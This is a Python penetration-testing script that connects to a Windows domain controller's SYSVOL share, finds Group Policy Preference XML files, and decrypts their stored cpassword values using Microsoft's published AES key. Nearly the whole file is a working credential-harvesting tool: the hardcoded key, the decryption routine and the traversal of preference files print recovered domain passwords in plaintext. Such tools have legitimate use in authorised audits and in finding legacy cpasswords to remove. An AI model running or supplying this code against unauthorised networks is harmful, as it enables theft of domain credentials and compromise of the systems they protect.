#!/usr/bin/python
"""
Pull the cpassword values that Group Policy Preferences store in SYSVOL and decrypt them.

The values are AES-256 ciphertext under a fixed key that Microsoft published in the
MS-GPPREF specification, so anyone who can read SYSVOL can recover the plaintext.
Based on the following blog post found by Ryan Elkins:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Required Python packages that are not normally included:
  smbclient - http://pypi.python.org/pypi/PySmbClient/0.1.1
  Crypto    - https://www.dlitz.net/software/pycrypto/ (already installed on Back|Track)

Usage: python ./gp_password.py <Server> <Username> <Password> <Domain>
Note that a password given on the command line is visible in the process list
and in the shell history of the machine you run this from.

Josh Kelley - 06/19/2012 @winfang98
"""
import base64
import binascii
import getpass
import re
import sys

import smbclient
from Crypto.Cipher import AES
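def asciirepl(match):
    """Return the character named by one ``\\xHH`` escape matched by ``reformat_content``.

    The pattern captures the two hex digits in group 1. The original passed the
    whole match (including the ``\\x`` prefix) to ``unhexlify``, which rejects
    it as odd-length / non-hex, so every replacement raised.

    Args:
        match: a regex match whose group 1 is two hex digits.

    Returns:
        The single character with that code point.

    Raises:
        ValueError: if group 1 is not a hex number.
    """
    return chr(int(match.group(1), 16))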
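def reformat_content(data):
    """Replace every literal ``\\xHH`` escape in *data* with the character it names.

    Only real hex digits are accepted: the original ``\\w{2}`` pattern also
    matched sequences such as ``\\xzz`` and then failed inside the replacement
    callback. Text without escapes is returned unchanged.

    Args:
        data: the string to rewrite.

    Returns:
        *data* with each ``\\xHH`` replaced by ``chr(0xHH)``.
    """
    hex_escape = re.compile(r"\\x([0-9a-fA-F]{2})")
    # Inline replacement so this function does not depend on a sibling helper.
    return hex_escape.sub(lambda m: chr(int(m.group(1), 16)), data)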
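# cpassword values are AES-256-CBC under a key Microsoft published in the
# MS-GPPREF specification, so anyone who can read SYSVOL can recover them
# (MS14-025 only stopped new ones from being written).
GPP_AES_KEY = binascii.unhexlify(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)
# The specification gives no IV; the stored ciphertext decrypts with an
# all-zero one. Pass it explicitly: the original `AES.new(key, 2)` relied on
# the library's default, and some AES builds pick a random IV when none is given.
GPP_AES_IV = b"\x00" * 16

# Preference files that can carry a cpassword attribute, as
# (directory, file) under <policy>/{MACHINE,USER}/Preferences/.
GPP_FILES = (
    ("Groups", "Groups.xml"),
    ("Services", "Services.xml"),
    ("ScheduledTasks", "ScheduledTasks.xml"),
    ("DataSources", "DataSources.xml"),
    ("Drives", "Drives.xml"),
    ("Printers", "Printers.xml"),
)

CPASSWORD_RE = re.compile(r'cpassword="([^"]*)"')
USAGE = "Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>"


def restore_base64_padding(value):
    """Return *value* with the '=' padding that the policy editor strips put back.

    Base64 needs 0-2 trailing '=' so the length is a multiple of four; the
    original code always appended exactly one, which is wrong for two of the
    three possible cases.
    """
    value = value.strip()
    return value + "=" * (-len(value) % 4)


def decrypt_cpassword(cpassword):
    """Return the plaintext of one GPP ``cpassword`` attribute value.

    The attribute holds unpadded base64 of AES-256-CBC ciphertext; the
    plaintext is the password encoded as UTF-16-LE followed by PKCS#7 padding.

    Raises:
        ValueError: if the value is not valid base64, is not a whole number of
            AES blocks, or does not decode as UTF-16-LE.
    """
    try:
        # The original called b64encode here, so it never decrypted the
        # stored ciphertext at all.
        ciphertext = base64.b64decode(restore_base64_padding(cpassword))
    except (TypeError, ValueError, binascii.Error) as err:
        raise ValueError("cpassword is not valid base64: %s" % err)
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword ciphertext is not a multiple of the AES block size")
    plaintext = AES.new(GPP_AES_KEY, AES.MODE_CBC, GPP_AES_IV).decrypt(ciphertext)
    # Strip PKCS#7 padding; a malformed pad is left in place rather than guessed at.
    pad = bytearray(plaintext[-1:])[0]
    if 1 <= pad <= 16 and plaintext[-pad:] == bytes(bytearray([pad] * pad)):
        plaintext = plaintext[:-pad]
    # The password is stored as UTF-16-LE, so decode it instead of
    # post-processing '\xNN' text that never appears in raw bytes.
    return plaintext.decode("utf-16-le")


def find_cpasswords(data):
    """Return every cpassword attribute value in the text of one preference XML file."""
    if isinstance(data, bytes) and not isinstance(data, str):
        data = data.decode("utf-8", "replace")
    return CPASSWORD_RE.findall(data)


def main(argv):
    """Connect to SYSVOL on <Server> and print every decryptable cpassword.

    Args:
        argv: the full command line, ``[script, server, username, password, domain]``.

    Returns:
        Process exit status: 0 on success, 1 on a usage or connection error.
    """
    if len(argv) != 5:
        print(USAGE)
        return 1
    server, username, password, domain = argv[1:5]
    # A password on the command line is visible in `ps` and shell history;
    # "-" asks for it interactively instead.
    if password == "-":
        password = getpass.getpass("Password for %s\\%s: " % (domain, username))
    # domain is not needed when logging onto the domain controller itself.
    smb = smbclient.SambaClient(server=server, share="SYSVOL", username=username,
                                password=password, domain=domain)

    print("[-] Looking for Group Policy Preference files")
    try:
        top_level = smb.listdir("/")
    except Exception as err:
        print("[!] Cannot login to the server: %s" % err)
        return 1
    if not top_level:
        print("[!] SYSVOL share is empty")
        return 1

    # SYSVOL normally holds one directory named after the domain; prefer an
    # entry that matches <Domain>, otherwise fall back to the first entry as
    # the original did.
    domain_dir = top_level[0]
    for entry in top_level:
        if entry.lower() == domain.lower():
            domain_dir = entry
            break
    policies_path = "/" + domain_dir + "/Policies/"
    try:
        policies = smb.listdir(policies_path)
    except Exception as err:
        print("[!] Cannot list %s: %s" % (policies_path, err))
        return 1

    found = 0
    for policy in policies:
        for side in ("MACHINE", "USER"):
            for subdir, filename in GPP_FILES:
                dir_path = "%s%s/%s/Preferences/%s/" % (policies_path, policy, side, subdir)
                try:
                    entries = smb.listdir(dir_path)
                except Exception:
                    continue  # most policies have no preferences of this kind
                for entry in entries:
                    if entry.lower() != filename.lower():
                        continue
                    file_path = dir_path + entry
                    print("[-] Found Policy: %s" % file_path)
                    try:
                        handle = smb.open(file_path)
                        try:
                            data = handle.read()
                        finally:
                            # NOTE(review): assumes the smbclient file object
                            # has close(); guarded in case it does not.
                            close = getattr(handle, "close", None)
                            if close is not None:
                                close()
                    except Exception as err:
                        print("[!] Cannot read %s: %s" % (file_path, err))
                        continue
                    for cpassword in find_cpasswords(data):
                        if not cpassword:
                            continue  # attribute present but blank
                        try:
                            print("[-] Password: %s" % decrypt_cpassword(cpassword))
                            found += 1
                        except ValueError as err:
                            print("[!] Could not decrypt %r: %s" % (cpassword, err))
    if not found:
        print("[-] No cpassword values found")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))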